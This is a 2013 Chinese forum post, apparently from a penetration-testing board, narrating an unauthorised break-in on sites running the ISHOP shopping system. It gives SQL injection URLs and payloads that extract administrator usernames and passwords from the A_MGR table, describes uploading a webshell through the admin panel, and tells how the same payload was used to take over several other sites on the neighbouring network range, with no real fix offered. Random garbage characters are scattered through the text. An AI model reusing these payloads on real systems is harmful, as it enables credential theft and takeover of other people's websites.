中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点
4 x& t, J6 E$ `http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833893 _( k% T* @! s6 Q" A. [! b

$ Q" @! v5 \/ g9 h& [+ ~4 \0 ~习惯性的加’having1=1--
9 T1 A- [+ J1 p+ c$ B2 d
: H- Y& A0 }5 ]+ a" Ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—5 N/ s" O% e, H* V+ E
$ p1 ^1 I4 E5 @2 q4 N5 x7 p8 K
03 |, U: y1 m  W( g& }9 u% p1 a
5 F1 Q0 ~9 ~3 u% [+ e/ j% k4 r
爆出Diary_A.dl_Title(这时候很激动啊)
7 \# F7 T7 w) _; x: c7 X
, p  Y& g$ p4 v* @6 G那么继续
" y4 ?5 \% d) y$ X& n. _) ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
2 p! `* q2 r) g" P2 f4 e: |4 E5 j$ p1 R7 v4 P
继续,一直爆下去
( ^# C6 R- h% z- E  P9 Y- f; X7 W: g0 x) R5 A0 ?  Z: F
爆到几个字段和表段 但是没找到需要的管理用户的字段7 a: V. f+ x! }8 f4 _
2 I. a* R* N0 l1 Z! G
蛋疼了 怎么办 然后去后台登陆页看源码, C+ |- H! i' ?) ?7 Z) n

0 \; D9 P* O" M8 M0' _9 c& u, w0 r

) x1 ]; Y. N9 k4 R+ M& AInput name= “ADUID”5 P) h3 N' n/ J4 t/ l
Input name= “ADPWD”! L0 w# ?% D* E  O6 C
$ t# b% F: r$ w# m0 X2 Z
很幸运 找到了字段那就继续* x+ @8 d- G* L' a' m8 o  r
找到之后开始爆用户
: r, `6 f* V- I' Z9 q& Ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—+ ^1 N  W) H8 B0 k/ W. H8 X  h
爆密码
1 L. a- N0 {' o0 N, s; Vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
. F# V4 Z0 D8 m3 d. [0 N测试了下 这个注入点只能爆到文章哪里的表
! n. M& e4 k3 B; q4 K' }2 L1 ^2 O6 e+ k( m8 J
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
! I2 Q$ y) }0 f' g1 B
' j" S- o9 L: g/ Z5 T+ m又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了, ~4 i( s7 F! b; s6 \* b
/ M/ W" e: T- z4 z
473, h! r$ Y/ ]9 C* O2 \
8 X0 R1 e3 L# X
进后台
* y" T' R9 O) s8 E' k9 L  j! v
& |: @/ ~8 T2 m% W- o, M1 Q' l# i3 G, q
发现几个上传点 有的地方不能上传 而且防止恶意代码
) w% u9 r2 J" w0 l
2 C3 w5 ?$ z0 O+ H! }  P没办法 各种百度各种找大牛 找到一只好像可以突破的马' A# t* ]* b8 l! Y/ J& [; w% U

) }+ j1 O! d& T9 z  Y; {' i
4 S- ]  L& W) [1 f$ [在系统管理那里直接上传 不过没有显示地址
+ x' z4 e# l9 r! R; p; k2 u& x  Y) c1 v% k5 z9 ~
再上传一次 抓包 搞定OK
7 c' _! R9 |  B  l4 O& M) Z; x! l9 p+ F% E, V9 j7 _

5 W" ?! x3 Q3 p( z4 ~# M8 F
7 q) A: v7 s7 x! e472' n+ Y& H& p1 ]% M+ n1 e
: E3 @+ V( ?7 C3 f9 N/ h
晚上不行了 去睡觉。。。+ d9 Q+ [" ?9 {) E: C
第二天刚起床 闲的没事做继续日站吧 . w  F& q' r8 K2 ]1 D2 I
0 J2 \, g1 S* j5 x
找个站 就把这个站的旁c扫了下# S- S  H, q- g- B. j6 B* \" l

- t5 S, x4 x3 \0 H$ C* \" L( Z% ^发现c段也有一个购物站 ,然后还和这个站的模板差不多
2 l3 h. S! r2 M5 R' k
. D* A0 s# k( B$ t% Q* E就找到会员登录口测试
+ O0 N8 a8 g. V! F# _  W$ I6 e" U7 m2 l; K. g
'and (select top 1 MGR_UID from A_MGR)>0—# F! ?" Q1 X' I8 ?. H
果断爆到了 这时候我很激动 通杀" q% D4 q4 {- `; d. i2 P! y4 W( |
4 h4 {% O( C$ j# {5 J1 L' C# V5 q
再次翻c段/ d& S7 c' n1 M8 g/ @

2 R! i' N9 J8 o9 T" j8 A. q翻出几个站 都成功拿下+ r0 j; U7 a1 n2 ~" g) f8 S

* r+ y/ d; F2 c) Z( U( c) H5 U5 W# R8 I1 w2 N) D

& p# F- ~9 F/ V! v% X" t) B& m修复方案:
2 }5 e% x5 c, C' u他们比我专业   P  s) M, T* u% s; D+ M

$ T1 k7 w5 C7 ]" T& v) J- G% R; ?) z9 j' a
) D% |  I: ?# T4 {





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2